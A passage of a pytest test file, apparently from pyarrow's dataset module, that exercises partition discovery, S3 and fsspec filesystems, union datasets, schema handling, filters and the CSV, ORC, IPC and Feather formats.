@pytest.mark.parametrize('use_threads', [False, True])
def test_scan_iterator(use_threads):
batch = pa.RecordBatch.from_arrays([pa.array(range(10))], names=["a"])
table = pa.Table.from_batches([batch])
# When constructed from readers/iterators, should be one-shot
match = "OneShotFragment was already scanned"
for factory, schema in (
(lambda: pa.RecordBatchReader.from_batches(
batch.schema, [batch]), None),
(lambda: (batch for _ in range(1)), batch.schema),
):
# Scanning the fragment consumes the underlying iterator
scanner = ds.Scanner.from_batches(
factory(), schema=schema, use_threads=use_threads)
assert scanner.to_table() == table
with pytest.raises(pa.ArrowInvalid, match=match):
scanner.to_table()
def _create_partitioned_dataset(basedir):
table = pa.table({'a': range(9), 'b': [0.] * 4 + [1.] * 5})
path = basedir / "dataset-partitioned"
path.mkdir()
for i in range(3):
part = path / "part={}".format(i)
part.mkdir()
pq.write_table(table.slice(3*i, 3), part / "test.parquet")
full_table = table.append_column(
"part", pa.array(np.repeat([0, 1, 2], 3), type=pa.int32()))
return full_table, path
@pytest.mark.parquet
def test_open_dataset_partitioned_directory(tempdir, dataset_reader):
full_table, path = _create_partitioned_dataset(tempdir)
# no partitioning specified, just read all individual files
table = full_table.select(['a', 'b'])
_check_dataset_from_path(path, table, dataset_reader)
# specify partition scheme with discovery
dataset = ds.dataset(
str(path), partitioning=ds.partitioning(flavor="hive"))
assert dataset.schema.equals(full_table.schema)
# specify partition scheme with discovery and relative path
with change_cwd(tempdir):
dataset = ds.dataset("dataset-partitioned/",
partitioning=ds.partitioning(flavor="hive"))
assert dataset.schema.equals(full_table.schema)
# specify partition scheme with string short-cut
dataset = ds.dataset(str(path), partitioning="hive")
assert dataset.schema.equals(full_table.schema)
# specify partition scheme with explicit scheme
dataset = ds.dataset(
str(path),
partitioning=ds.partitioning(
pa.schema([("part", pa.int8())]), flavor="hive"))
expected_schema = table.schema.append(pa.field("part", pa.int8()))
assert dataset.schema.equals(expected_schema)
result = dataset.to_table()
expected = table.append_column(
"part", pa.array(np.repeat([0, 1, 2], 3), type=pa.int8()))
assert result.equals(expected)
@pytest.mark.parquet
def test_open_dataset_filesystem(tempdir):
# single file
table, path = _create_single_file(tempdir)
# filesystem inferred from path
dataset1 = ds.dataset(str(path))
assert dataset1.schema.equals(table.schema)
# filesystem specified
dataset2 = ds.dataset(str(path), filesystem=fs.LocalFileSystem())
assert dataset2.schema.equals(table.schema)
# local filesystem specified with relative path
with change_cwd(tempdir):
dataset3 = ds.dataset("test.parquet", filesystem=fs.LocalFileSystem())
assert dataset3.schema.equals(table.schema)
# passing different filesystem
with pytest.raises(FileNotFoundError):
ds.dataset(str(path), filesystem=fs._MockFileSystem())
@pytest.mark.parquet
def test_open_dataset_unsupported_format(tempdir):
_, path = _create_single_file(tempdir)
with pytest.raises(ValueError, match="format 'blabla' is not supported"):
ds.dataset([path], format="blabla")
@pytest.mark.parquet
def test_open_union_dataset(tempdir, dataset_reader):
_, path = _create_single_file(tempdir)
dataset = ds.dataset(path)
union = ds.dataset([dataset, dataset])
assert isinstance(union, ds.UnionDataset)
pickled = pickle.loads(pickle.dumps(union))
assert dataset_reader.to_table(pickled) == dataset_reader.to_table(union)
def test_open_union_dataset_with_additional_kwargs(multisourcefs):
child = ds.dataset('/plain', filesystem=multisourcefs, format='parquet')
with pytest.raises(ValueError, match="cannot pass any additional"):
ds.dataset([child], format="parquet")
def test_open_dataset_non_existing_file():
# ARROW-8213: Opening a dataset with a local incorrect path gives confusing
# error message
with pytest.raises(FileNotFoundError):
ds.dataset('i-am-not-existing.arrow', format='ipc')
with pytest.raises(pa.ArrowInvalid, match='cannot be relative'):
ds.dataset('file:i-am-not-existing.arrow', format='ipc')
@pytest.mark.parquet
@pytest.mark.parametrize('partitioning', ["directory", "hive"])
@pytest.mark.parametrize('null_fallback', ['xyz', None])
@pytest.mark.parametrize('infer_dictionary', [False, True])
@pytest.mark.parametrize('partition_keys', [
(["A", "B", "C"], [1, 2, 3]),
([1, 2, 3], ["A", "B", "C"]),
(["A", "B", "C"], ["D", "E", "F"]),
([1, 2, 3], [4, 5, 6]),
([1, None, 3], ["A", "B", "C"]),
([1, 2, 3], ["A", None, "C"]),
([None, 2, 3], [None, 2, 3]),
])
def test_partition_discovery(
tempdir, partitioning, null_fallback, infer_dictionary, partition_keys
):
# ARROW-9288 / ARROW-9476
table = pa.table({'a': range(9), 'b': [0.0] * 4 + [1.0] * 5})
has_null = None in partition_keys[0] or None in partition_keys[1]
if partitioning == "directory" and has_null:
# Directory partitioning can't handle the first part being null
return
if partitioning == "directory":
partitioning = ds.DirectoryPartitioning.discover(
["part1", "part2"], infer_dictionary=infer_dictionary)
fmt = "{0}/{1}"
null_value = None
else:
if null_fallback:
partitioning = ds.HivePartitioning.discover(
infer_dictionary=infer_dictionary, null_fallback=null_fallback
)
else:
partitioning = ds.HivePartitioning.discover(
infer_dictionary=infer_dictionary)
fmt = "part1={0}/part2={1}"
if null_fallback:
null_value = null_fallback
else:
null_value = "__HIVE_DEFAULT_PARTITION__"
basepath = tempdir / "dataset"
basepath.mkdir()
part_keys1, part_keys2 = partition_keys
for part1 in part_keys1:
for part2 in part_keys2:
path = basepath / \
fmt.format(part1 or null_value, part2 or null_value)
path.mkdir(parents=True)
pq.write_table(table, path / "test.parquet")
dataset = ds.dataset(str(basepath), partitioning=partitioning)
def expected_type(key):
if infer_dictionary:
value_type = pa.string() if isinstance(key, str) else pa.int32()
return pa.dictionary(pa.int32(), value_type)
else:
return pa.string() if isinstance(key, str) else pa.int32()
expected_schema = table.schema.append(
pa.field("part1", expected_type(part_keys1[0]))
).append(
pa.field("part2", expected_type(part_keys2[0]))
)
assert dataset.schema.equals(expected_schema)
@pytest.mark.pandas
def test_dataset_partitioned_dictionary_type_reconstruct(tempdir):
# https://issues.apache.org/jira/browse/ARROW-11400
table = pa.table({'part': np.repeat(['A', 'B'], 5), 'col': range(10)})
part = ds.partitioning(table.select(['part']).schema, flavor="hive")
ds.write_dataset(table, tempdir, partitioning=part, format="feather")
dataset = ds.dataset(
tempdir, format="feather",
partitioning=ds.HivePartitioning.discover(infer_dictionary=True)
)
expected = pa.table(
{'col': table['col'], 'part': table['part'].dictionary_encode()}
)
assert dataset.to_table().equals(expected)
fragment = list(dataset.get_fragments())[0]
assert fragment.to_table(schema=dataset.schema).equals(expected[:5])
part_expr = fragment.partition_expression
restored = pickle.loads(pickle.dumps(dataset))
assert restored.to_table().equals(expected)
restored = pickle.loads(pickle.dumps(fragment))
assert restored.to_table(schema=dataset.schema).equals(expected[:5])
# to_pandas call triggers computation of the actual dictionary values
assert restored.to_table(schema=dataset.schema).to_pandas().equals(
expected[:5].to_pandas()
)
assert restored.partition_expression.equals(part_expr)
@pytest.fixture
@pytest.mark.parquet
def s3_example_simple(s3_server):
from pyarrow.fs import FileSystem
host, port, access_key, secret_key = s3_server['connection']
uri = (
"s3://{}:{}@mybucket/data.parquet?scheme=http&endpoint_override={}:{}"
"&allow_bucket_creation=True"
.format(access_key, secret_key, host, port)
)
fs, path = FileSystem.from_uri(uri)
fs.create_dir("mybucket")
table = pa.table({'a': [1, 2, 3]})
with fs.open_output_stream("mybucket/data.parquet") as out:
pq.write_table(table, out)
return table, path, fs, uri, host, port, access_key, secret_key
@pytest.mark.parquet
@pytest.mark.s3
def test_open_dataset_from_uri_s3(s3_example_simple, dataset_reader):
# open dataset from non-localfs string path
table, path, fs, uri, _, _, _, _ = s3_example_simple
# full string URI
dataset = ds.dataset(uri, format="parquet")
assert dataset_reader.to_table(dataset).equals(table)
# passing filesystem object
dataset = ds.dataset(path, format="parquet", filesystem=fs)
assert dataset_reader.to_table(dataset).equals(table)
@pytest.mark.parquet
@pytest.mark.s3 # still needed to create the data
def test_open_dataset_from_uri_s3_fsspec(s3_example_simple):
table, path, _, _, host, port, access_key, secret_key = s3_example_simple
s3fs = pytest.importorskip("s3fs")
from pyarrow.fs import PyFileSystem, FSSpecHandler
fs = s3fs.S3FileSystem(
key=access_key,
secret=secret_key,
client_kwargs={
'endpoint_url': 'http://{}:{}'.format(host, port)
}
)
# passing as fsspec filesystem
dataset = ds.dataset(path, format="parquet", filesystem=fs)
assert dataset.to_table().equals(table)
# directly passing the fsspec-handler
fs = PyFileSystem(FSSpecHandler(fs))
dataset = ds.dataset(path, format="parquet", filesystem=fs)
assert dataset.to_table().equals(table)
@pytest.mark.parquet
@pytest.mark.s3
def test_open_dataset_from_s3_with_filesystem_uri(s3_server):
from pyarrow.fs import FileSystem
host, port, access_key, secret_key = s3_server['connection']
bucket = 'theirbucket'
path = 'nested/folder/data.parquet'
uri = "s3://{}:{}@{}/{}?scheme=http&endpoint_override={}:{}"\
"&allow_bucket_creation=true".format(
access_key, secret_key, bucket, path, host, port
)
fs, path = FileSystem.from_uri(uri)
assert path == 'theirbucket/nested/folder/data.parquet'
fs.create_dir(bucket)
table = pa.table({'a': [1, 2, 3]})
with fs.open_output_stream(path) as out:
pq.write_table(table, out)
# full string URI
dataset = ds.dataset(uri, format="parquet")
assert dataset.to_table().equals(table)
# passing filesystem as an uri
template = (
"s3://{}:{}@{{}}?scheme=http&endpoint_override={}:{}".format(
access_key, secret_key, host, port
)
)
cases = [
('theirbucket/nested/folder/', '/data.parquet'),
('theirbucket/nested/folder', 'data.parquet'),
('theirbucket/nested/', 'folder/data.parquet'),
('theirbucket/nested', 'folder/data.parquet'),
('theirbucket', '/nested/folder/data.parquet'),
('theirbucket', 'nested/folder/data.parquet'),
]
for prefix, path in cases:
uri = template.format(prefix)
dataset = ds.dataset(path, filesystem=uri, format="parquet")
assert dataset.to_table().equals(table)
with pytest.raises(pa.ArrowInvalid, match='Missing bucket name'):
uri = template.format('/')
ds.dataset('/theirbucket/nested/folder/data.parquet', filesystem=uri)
error = (
"The path component of the filesystem URI must point to a directory "
"but it has a type: `{}`. The path component is `{}` and the given "
"filesystem URI is `{}`"
)
path = 'theirbucket/doesnt/exist'
uri = template.format(path)
with pytest.raises(ValueError) as exc:
ds.dataset('data.parquet', filesystem=uri)
assert str(exc.value) == error.format('NotFound', path, uri)
path = 'theirbucket/nested/folder/data.parquet'
uri = template.format(path)
with pytest.raises(ValueError) as exc:
ds.dataset('data.parquet', filesystem=uri)
assert str(exc.value) == error.format('File', path, uri)
@pytest.mark.parquet
def test_open_dataset_from_fsspec(tempdir):
table, path = _create_single_file(tempdir)
fsspec = pytest.importorskip("fsspec")
localfs = fsspec.filesystem("file")
dataset = ds.dataset(path, filesystem=localfs)
assert dataset.schema.equals(table.schema)
@pytest.mark.parquet
def test_file_format_inspect_fsspec(tempdir):
# https://issues.apache.org/jira/browse/ARROW-16413
fsspec = pytest.importorskip("fsspec")
# create bucket + file with pyarrow
table = pa.table({'a': [1, 2, 3]})
path = tempdir / "data.parquet"
pq.write_table(table, path)
# read using fsspec filesystem
fsspec_fs = fsspec.filesystem("file")
assert fsspec_fs.ls(tempdir)[0].endswith("data.parquet")
# inspect using dataset file format
format = ds.ParquetFileFormat()
# manually creating a PyFileSystem instead of using fs._ensure_filesystem
# which would convert an fsspec local filesystem to a native one
filesystem = fs.PyFileSystem(fs.FSSpecHandler(fsspec_fs))
schema = format.inspect(path, filesystem)
assert schema.equals(table.schema)
fragment = format.make_fragment(path, filesystem)
assert fragment.physical_schema.equals(table.schema)
@pytest.mark.pandas
def test_filter_timestamp(tempdir, dataset_reader):
# ARROW-11379
path = tempdir / "test_partition_timestamps"
table = pa.table({
"dates": ['2012-01-01', '2012-01-02'] * 5,
"id": range(10)})
# write dataset partitioned on dates (as strings)
part = ds.partitioning(table.select(['dates']).schema, flavor="hive")
ds.write_dataset(table, path, partitioning=part, format="feather")
# read dataset partitioned on dates (as timestamps)
part = ds.partitioning(pa.schema([("dates", pa.timestamp("s"))]),
flavor="hive")
dataset = ds.dataset(path, format="feather", partitioning=part)
condition = ds.field("dates") > pd.Timestamp("2012-01-01")
table = dataset_reader.to_table(dataset, filter=condition)
assert table.column('id').to_pylist() == [1, 3, 5, 7, 9]
import datetime
condition = ds.field("dates") > datetime.datetime(2012, 1, 1)
table = dataset_reader.to_table(dataset, filter=condition)
assert table.column('id').to_pylist() == [1, 3, 5, 7, 9]
@pytest.mark.parquet
def test_filter_implicit_cast(tempdir, dataset_reader):
# ARROW-7652
table = pa.table({'a': pa.array([0, 1, 2, 3, 4, 5], type=pa.int8())})
_, path = _create_single_file(tempdir, table)
dataset = ds.dataset(str(path))
filter_ = ds.field('a') > 2
assert len(dataset_reader.to_table(dataset, filter=filter_)) == 3
@pytest.mark.parquet
def test_filter_equal_null(tempdir, dataset_reader):
# ARROW-12066 equality with null, although not useful, should not crash
table = pa.table({"A": ["a", "b", None]})
_, path = _create_single_file(tempdir, table)
dataset = ds.dataset(str(path))
table = dataset_reader.to_table(
dataset, filter=ds.field("A") == ds.scalar(None)
)
assert table.num_rows == 0
@pytest.mark.parquet
def test_filter_compute_expression(tempdir, dataset_reader):
table = pa.table({
"A": ["a", "b", None, "a", "c"],
"B": [datetime.datetime(2022, 1, 1, i) for i in range(5)],
"C": [datetime.datetime(2022, 1, i) for i in range(1, 6)],
})
_, path = _create_single_file(tempdir, table)
dataset = ds.dataset(str(path))
filter_ = pc.is_in(ds.field('A'), pa.array(["a", "b"]))
assert dataset_reader.to_table(dataset, filter=filter_).num_rows == 3
filter_ = pc.hour(ds.field('B')) >= 3
assert dataset_reader.to_table(dataset, filter=filter_).num_rows == 2
days = pc.days_between(ds.field('B'), ds.field("C"))
result = dataset_reader.to_table(dataset, columns={"days": days})
assert result["days"].to_pylist() == [0, 1, 2, 3, 4]
def test_dataset_union(multisourcefs):
child = ds.FileSystemDatasetFactory(
multisourcefs, fs.FileSelector('/plain'),
format=ds.ParquetFileFormat()
)
factory = ds.UnionDatasetFactory([child])
# TODO(bkietz) reintroduce factory.children property
assert len(factory.inspect_schemas()) == 1
assert all(isinstance(s, pa.Schema) for s in factory.inspect_schemas())
assert factory.inspect_schemas()[0].equals(child.inspect())
assert factory.inspect().equals(child.inspect())
assert isinstance(factory.finish(), ds.Dataset)
def test_union_dataset_from_other_datasets(tempdir, multisourcefs):
child1 = ds.dataset('/plain', filesystem=multisourcefs, format='parquet')
child2 = ds.dataset('/schema', filesystem=multisourcefs, format='parquet',
partitioning=['week', 'color'])
child3 = ds.dataset('/hive', filesystem=multisourcefs, format='parquet',
partitioning='hive')
assert child1.schema != child2.schema != child3.schema
assembled = ds.dataset([child1, child2, child3])
assert isinstance(assembled, ds.UnionDataset)
msg = 'cannot pass any additional arguments'
with pytest.raises(ValueError, match=msg):
ds.dataset([child1, child2], filesystem=multisourcefs)
expected_schema = pa.schema([
('date', pa.date32()),
('index', pa.int64()),
('value', pa.float64()),
('color', pa.string()),
('week', pa.int32()),
('year', pa.int32()),
('month', pa.int32()),
])
assert assembled.schema.equals(expected_schema)
assert assembled.to_table().schema.equals(expected_schema)
assembled = ds.dataset([child1, child3])
expected_schema = pa.schema([
('date', pa.date32()),
('index', pa.int64()),
('value', pa.float64()),
('color', pa.string()),
('year', pa.int32()),
('month', pa.int32()),
])
assert assembled.schema.equals(expected_schema)
assert assembled.to_table().schema.equals(expected_schema)
expected_schema = pa.schema([
('month', pa.int32()),
('color', pa.string()),
('date', pa.date32()),
])
assembled = ds.dataset([child1, child3], schema=expected_schema)
assert assembled.to_table().schema.equals(expected_schema)
expected_schema = pa.schema([
('month', pa.int32()),
('color', pa.string()),
('unknown', pa.string()) # fill with nulls
])
assembled = ds.dataset([child1, child3], schema=expected_schema)
assert assembled.to_table().schema.equals(expected_schema)
# incompatible schemas, date and index columns have conflicting types
table = pa.table([range(9), [0.] * 4 + [1.] * 5, 'abcdefghj'],
names=['date', 'value', 'index'])
_, path = _create_single_file(tempdir, table=table)
child4 = ds.dataset(path)
with pytest.raises(pa.ArrowInvalid, match='Unable to merge'):
ds.dataset([child1, child4])
def test_dataset_from_a_list_of_local_directories_raises(multisourcefs):
msg = 'points to a directory, but only file paths are supported'
with pytest.raises(IsADirectoryError, match=msg):
ds.dataset(['/plain', '/schema', '/hive'], filesystem=multisourcefs)
def test_union_dataset_filesystem_datasets(multisourcefs):
# without partitioning
dataset = ds.dataset([
ds.dataset('/plain', filesystem=multisourcefs),
ds.dataset('/schema', filesystem=multisourcefs),
ds.dataset('/hive', filesystem=multisourcefs),
])
expected_schema = pa.schema([
('date', pa.date32()),
('index', pa.int64()),
('value', pa.float64()),
('color', pa.string()),
])
assert dataset.schema.equals(expected_schema)
# with hive partitioning for two hive sources
dataset = ds.dataset([
ds.dataset('/plain', filesystem=multisourcefs),
ds.dataset('/schema', filesystem=multisourcefs),
ds.dataset('/hive', filesystem=multisourcefs, partitioning='hive')
])
expected_schema = pa.schema([
('date', pa.date32()),
('index', pa.int64()),
('value', pa.float64()),
('color', pa.string()),
('year', pa.int32()),
('month', pa.int32()),
])
assert dataset.schema.equals(expected_schema)
@pytest.mark.parquet
def test_specified_schema(tempdir, dataset_reader):
table = pa.table({'a': [1, 2, 3], 'b': [.1, .2, .3]})
pq.write_table(table, tempdir / "data.parquet")
def _check_dataset(schema, expected, expected_schema=None):
dataset = ds.dataset(str(tempdir / "data.parquet"), schema=schema)
if expected_schema is not None:
assert dataset.schema.equals(expected_schema)
else:
assert dataset.schema.equals(schema)
result = dataset_reader.to_table(dataset)
assert result.equals(expected)
# no schema specified
schema = None
expected = table
_check_dataset(schema, expected, expected_schema=table.schema)
# identical schema specified
schema = table.schema
expected = table
_check_dataset(schema, expected)
# Specifying schema with change column order
schema = pa.schema([('b', 'float64'), ('a', 'int64')])
expected = pa.table([[.1, .2, .3], [1, 2, 3]], names=['b', 'a'])
_check_dataset(schema, expected)
# Specifying schema with missing column
schema = pa.schema([('a', 'int64')])
expected = pa.table([[1, 2, 3]], names=['a'])
_check_dataset(schema, expected)
# Specifying schema with additional column
schema = pa.schema([('a', 'int64'), ('c', 'int32')])
expected = pa.table([[1, 2, 3],
pa.array([None, None, None], type='int32')],
names=['a', 'c'])
_check_dataset(schema, expected)
# Specifying with differing field types
schema = pa.schema([('a', 'int32'), ('b', 'float64')])
dataset = ds.dataset(str(tempdir / "data.parquet"), schema=schema)
expected = pa.table([table['a'].cast('int32'),
table['b']],
names=['a', 'b'])
_check_dataset(schema, expected)
# Specifying with incompatible schema
schema = pa.schema([('a', pa.list_(pa.int32())), ('b', 'float64')])
dataset = ds.dataset(str(tempdir / "data.parquet"), schema=schema)
assert dataset.schema.equals(schema)
with pytest.raises(NotImplementedError,
match='Unsupported cast from int64 to list'):
dataset_reader.to_table(dataset)
@pytest.mark.parquet
def test_incompatible_schema_hang(tempdir, dataset_reader):
# ARROW-13480: deadlock when reading past an errored fragment
fn = tempdir / "data.parquet"
table = pa.table({'a': [1, 2, 3]})
pq.write_table(table, fn)
schema = pa.schema([('a', pa.null())])
dataset = ds.dataset([str(fn)] * 100, schema=schema)
assert dataset.schema.equals(schema)
scanner = dataset_reader.scanner(dataset)
with pytest.raises(NotImplementedError,
match='Unsupported cast from int64 to null'):
reader = scanner.to_reader()
reader.read_all()
def test_ipc_format(tempdir, dataset_reader):
table = pa.table({'a': pa.array([1, 2, 3], type="int8"),
'b': pa.array([.1, .2, .3], type="float64")})
path = str(tempdir / 'test.arrow')
with pa.output_stream(path) as sink:
writer = pa.RecordBatchFileWriter(sink, table.schema)
writer.write_batch(table.to_batches()[0])
writer.close()
dataset = ds.dataset(path, format=ds.IpcFileFormat())
result = dataset_reader.to_table(dataset)
assert result.equals(table)
for format_str in ["ipc", "arrow"]:
dataset = ds.dataset(path, format=format_str)
result = dataset_reader.to_table(dataset)
assert result.equals(table)
@pytest.mark.orc
def test_orc_format(tempdir, dataset_reader):
from pyarrow import orc
table = pa.table({'a': pa.array([1, 2, 3], type="int8"),
'b': pa.array([.1, .2, .3], type="float64")})
path = str(tempdir / 'test.orc')
orc.write_table(table, path)
dataset = ds.dataset(path, format=ds.OrcFileFormat())
fragments = list(dataset.get_fragments())
assert isinstance(fragments[0], ds.FileFragment)
result = dataset_reader.to_table(dataset)
result.validate(full=True)
assert result.equals(table)
dataset = ds.dataset(path, format="orc")
result = dataset_reader.to_table(dataset)
result.validate(full=True)
assert result.equals(table)
result = dataset_reader.to_table(dataset, columns=["b"])
result.validate(full=True)
assert result.equals(table.select(["b"]))
result = dataset_reader.to_table(
dataset, columns={"b2": ds.field("b") * 2}
)
result.validate(full=True)
assert result.equals(
pa.table({'b2': pa.array([.2, .4, .6], type="float64")})
)
assert dataset_reader.count_rows(dataset) == 3
assert dataset_reader.count_rows(dataset, filter=ds.field("a") > 2) == 1
@pytest.mark.orc
def test_orc_scan_options(tempdir, dataset_reader):
from pyarrow import orc
table = pa.table({'a': pa.array([1, 2, 3], type="int8"),
'b': pa.array([.1, .2, .3], type="float64")})
path = str(tempdir / 'test.orc')
orc.write_table(table, path)
dataset = ds.dataset(path, format="orc")
result = list(dataset_reader.to_batches(dataset))
assert len(result) == 1
assert result[0].num_rows == 3
assert result[0].equals(table.to_batches()[0])
# TODO batch_size is not yet supported (ARROW-14153)
# result = list(dataset_reader.to_batches(dataset, batch_size=2))
# assert len(result) == 2
# assert result[0].num_rows == 2
# assert result[0].equals(table.slice(0, 2).to_batches()[0])
# assert result[1].num_rows == 1
# assert result[1].equals(table.slice(2, 1).to_batches()[0])
def test_orc_format_not_supported():
try:
from pyarrow.dataset import OrcFileFormat # noqa
except ImportError:
# ORC is not available, test error message
with pytest.raises(
ValueError, match="not built with support for the ORC file"
):
ds.dataset(".", format="orc")
@pytest.mark.pandas
def test_csv_format(tempdir, dataset_reader):
table = pa.table({'a': pa.array([1, 2, 3], type="int64"),
'b': pa.array([.1, .2, .3], type="float64")})
path = str(tempdir / 'test.csv')
table.to_pandas().to_csv(path, index=False)
dataset = ds.dataset(path, format=ds.CsvFileFormat())
result = dataset_reader.to_table(dataset)
assert result.equals(table)
dataset = ds.dataset(path, format='csv')
result = dataset_reader.to_table(dataset)
assert result.equals(table)
@pytest.mark.pandas
@pytest.mark.parametrize("compression", [
"bz2",
"gzip",
"lz4",
"zstd",
])
def test_csv_format_compressed(tempdir, compression, dataset_reader):
if not pyarrow.Codec.is_available(compression):
pytest.skip("{} support is not built".format(compression))
table = pa.table({'a': pa.array([1, 2, 3], type="int64"),
'b': pa.array([.1, .2, .3], type="float64")})
filesystem = fs.LocalFileSystem()
suffix = compression if compression != 'gzip' else 'gz'
path = str(tempdir / f'test.csv.{suffix}')
with filesystem.open_output_stream(path, compression=compression) as sink:
# https://github.com/pandas-dev/pandas/issues/23854
# With CI version of Pandas (anything < 1.2), Pandas tries to write
# str to the sink
csv_str = table.to_pandas().to_csv(index=False)
sink.write(csv_str.encode('utf-8'))
dataset = ds.dataset(path, format=ds.CsvFileFormat())
result = dataset_reader.to_table(dataset)
assert result.equals(table)
def test_csv_format_options(tempdir, dataset_reader):
path = str(tempdir / 'test.csv')
with open(path, 'w') as sink:
sink.write('skipped\ncol0\nfoo\nbar\n')
dataset = ds.dataset(path, format='csv')
result = dataset_reader.to_table(dataset)
assert result.equals(
pa.table({'skipped': pa.array(['col0', 'foo', 'bar'])}))
dataset = ds.dataset(path, format=ds.CsvFileFormat(
read_options=pa.csv.ReadOptions(skip_rows=1)))
result = dataset_reader.to_table(dataset)
assert result.equals(pa.table({'col0': pa.array(['foo', 'bar'])}))
dataset = ds.dataset(path, format=ds.CsvFileFormat(
read_options=pa.csv.ReadOptions(column_names=['foo'])))
result = dataset_reader.to_table(dataset)
assert result.equals(
pa.table({'foo': pa.array(['skipped', 'col0', 'foo', 'bar'])}))
def test_csv_format_options_generate_columns(tempdir, dataset_reader):
path = str(tempdir / 'test.csv')
with open(path, 'w') as sink:
sink.write('1,a,true,1\n')
dataset = ds.dataset(path, format=ds.CsvFileFormat(
read_options=pa.csv.ReadOptions(autogenerate_column_names=True)))
result = dataset_reader.to_table(dataset)
expected_column_names = ["f0", "f1", "f2", "f3"]
assert result.column_names == expected_column_names
assert result.equals(pa.table({'f0': pa.array([1]),
'f1': pa.array(["a"]),
'f2': pa.array([True]),
'f3': pa.array([1])}))
def test_csv_fragment_options(tempdir, dataset_reader):
path = str(tempdir / 'test.csv')
with open(path, 'w') as sink:
sink.write('col0\nfoo\nspam\nMYNULL\n')
dataset = ds.dataset(path, format='csv')
convert_options = pyarrow.csv.ConvertOptions(null_values=['MYNULL'],
strings_can_be_null=True)
options = ds.CsvFragmentScanOptions(
convert_options=convert_options,
read_options=pa.csv.ReadOptions(block_size=2**16))
result = dataset_reader.to_table(dataset, fragment_scan_options=options)
assert result.equals(pa.table({'col0': pa.array(['foo', 'spam', None])}))
csv_format = ds.CsvFileFormat(convert_options=convert_options)
dataset = ds.dataset(path, format=csv_format)
result = dataset_reader.to_table(dataset)
assert result.equals(pa.table({'col0': pa.array(['foo', 'spam', None])}))
options = ds.CsvFragmentScanOptions()
result = dataset_reader.to_table(dataset, fragment_scan_options=options)
assert result.equals(
pa.table({'col0': pa.array(['foo', 'spam', 'MYNULL'])}))
def test_encoding(tempdir, dataset_reader):
path = str(tempdir / 'test.csv')
for encoding, input_rows in [
('latin-1', b"a,b\nun,\xe9l\xe9phant"),
('utf16', b'\xff\xfea\x00,\x00b\x00\n\x00u\x00n\x00,'
b'\x00\xe9\x00l\x00\xe9\x00p\x00h\x00a\x00n\x00t\x00'),
]:
with open(path, 'wb') as sink:
sink.write(input_rows)
# Interpret as utf8:
expected_schema = pa.schema([("a", pa.string()), ("b", pa.string())])
expected_table = pa.table({'a': ["un"],
'b': ["éléphant"]}, schema=expected_schema)
read_options = pa.csv.ReadOptions(encoding=encoding)
file_format = ds.CsvFileFormat(read_options=read_options)
dataset_transcoded = ds.dataset(path, format=file_format)
assert dataset_transcoded.schema.equals(expected_schema)
assert dataset_transcoded.to_table().equals(expected_table)
# Test if a dataset with non-utf8 chars in the column names is properly handled
def test_column_names_encoding(tempdir, dataset_reader):
path = str(tempdir / 'test.csv')
with open(path, 'wb') as sink:
sink.write(b"\xe9,b\nun,\xe9l\xe9phant")
# Interpret as utf8:
expected_schema = pa.schema([("é", pa.string()), ("b", pa.string())])
expected_table = pa.table({'é': ["un"],
'b': ["éléphant"]}, schema=expected_schema)
# Reading as string without specifying encoding should produce an error
dataset = ds.dataset(path, format='csv', schema=expected_schema)
with pytest.raises(pyarrow.lib.ArrowInvalid, match="invalid UTF8"):
dataset_reader.to_table(dataset)
# Setting the encoding in the read_options should transcode the data
read_options = pa.csv.ReadOptions(encoding='latin-1')
file_format = ds.CsvFileFormat(read_options=read_options)
dataset_transcoded = ds.dataset(path, format=file_format)
assert dataset_transcoded.schema.equals(expected_schema)
assert dataset_transcoded.to_table().equals(expected_table)
def test_feather_format(tempdir, dataset_reader):
from pyarrow.feather import write_feather
table = pa.table({'a': pa.array([1, 2, 3], type="int8"),
'b': pa.array([.1, .2, .3], type="float64")})
basedir = tempdir / "feather_dataset"
basedir.mkdir()
write_feather(table, str(basedir / "data.feather"))
dataset = ds.dataset(basedir, format=ds.IpcFileFormat())
result = dataset_reader.to_table(dataset)
assert result.equals(table)
dataset = ds.dataset(basedir, format="feather")
result = dataset_reader.to_table(dataset)
assert result.equals(table)
# ARROW-8641 - column selection order
result = dataset_reader.to_table(dataset, columns=["b", "a"])
assert result.column_names == ["b", "a"]
result = dataset_reader.to_table(dataset, columns=["a", "a"])
assert result.column_names == ["a", "a"]
# error with Feather v1 files
write_feather(table, str(basedir / "data1.feather"), version=1)
with pytest.raises(ValueError):
dataset_reader.to_table(ds.dataset(basedir, format="feather"))
def _create_parquet_dataset_simple(root_path):
"""
Creates a simple (flat files, no nested partitioning) Parquet dataset
"""
metadata_collector = []
for i in range(4):
table = pa.table({'f1': [i] * 10, 'f2': np.random.randn(10)})
pq.write_to_dataset(
table, str(root_path), metadata_collector=metadata_collector
)
metadata_path = str(root_path / '_metadata')
# write _metadata file
pq.write_metadata(
table.schema, metadata_path,
metadata_collector=metadata_collector
)
return metadata_path, table
@pytest.mark.parquet
@pytest.mark.pandas # write_to_dataset currently requires pandas
def test_parquet_dataset_factory(tempdir):
root_path = tempdir / "test_parquet_dataset"
metadata_path, table = _create_parquet_dataset_simple(root_path)
dataset = ds.parquet_dataset(metadata_path)
assert dataset.schema.equals(table.schema)
assert len(dataset.files) == 4
result = dataset.to_table()
assert result.num_rows == 40
@pytest.mark.parquet
@pytest.mark.pandas # write_to_dataset currently requires pandas
@pytest.mark.skipif(sys.platform == 'win32',
reason="Results in FileNotFoundError on Windows")
def test_parquet_dataset_factory_fsspec(tempdir):
# https://issues.apache.org/jira/browse/ARROW-16413
fsspec = pytest.importorskip("fsspec")
# create dataset with pyarrow
root_path = tempdir / "test_parquet_dataset"
metadata_path, table = _create_parquet_dataset_simple(root_path)
# read using fsspec filesystem
fsspec_fs = fsspec.filesystem("file")
# manually creating a PyFileSystem, because passing the local fsspec
# filesystem would internally be converted to native LocalFileSystem
filesystem = fs.PyFileSystem(fs.FSSpecHandler(fsspec_fs))
dataset = ds.parquet_dataset(metadata_path, filesystem=filesystem)
assert dataset.schema.equals(table.schema)
assert len(dataset.files) == 4
result = dataset.to_table()
assert result.num_rows == 40
@pytest.mark.parquet
@pytest.mark.pandas # write_to_dataset currently requires pandas
@pytest.mark.parametrize('use_legacy_dataset', [False, True])
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_parquet_dataset_factory_roundtrip(tempdir, use_legacy_dataset):
# Simple test to ensure we can roundtrip dataset to
# _metadata/common_metadata and back. A more complex test
# using partitioning will have to wait for ARROW-13269. The
# above test (test_parquet_dataset_factory) will not work
# when legacy is False as there is no "append" equivalent in
# the new dataset until ARROW-12358
root_path = tempdir / "test_parquet_dataset"
